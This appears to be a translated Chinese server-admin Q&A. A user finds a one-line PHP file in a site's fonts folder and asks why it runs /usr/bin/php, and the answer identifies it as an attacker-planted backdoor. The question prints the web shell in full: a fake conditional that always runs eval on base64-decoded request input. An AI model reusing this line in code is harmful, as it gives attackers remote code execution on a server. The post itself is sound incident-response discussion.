可能重复:
如何处理受感染的服务器?
检查 lfd.log 并注意到脚本的块日志:
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php
看起来脚本正在尝试执行 /usr/bin/php 但是当我看到代码时,它是一个简单的单行文件
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
任何人都有类似的经历,有没有办法查看导致 /usr/bin/php 调用的原因?日志说脚本是通过 POST 调用的。
有人在此目录中放置了一个攻击脚本。如果
eval未在您的 PHP 配置中停用,这将允许攻击者执行随请求一起发送的任意 PHP 代码。该脚本通过简单的 HTTP POST 请求调用。
您应该考虑您的系统受到威胁并尝试找出攻击者如何设法放置此脚本。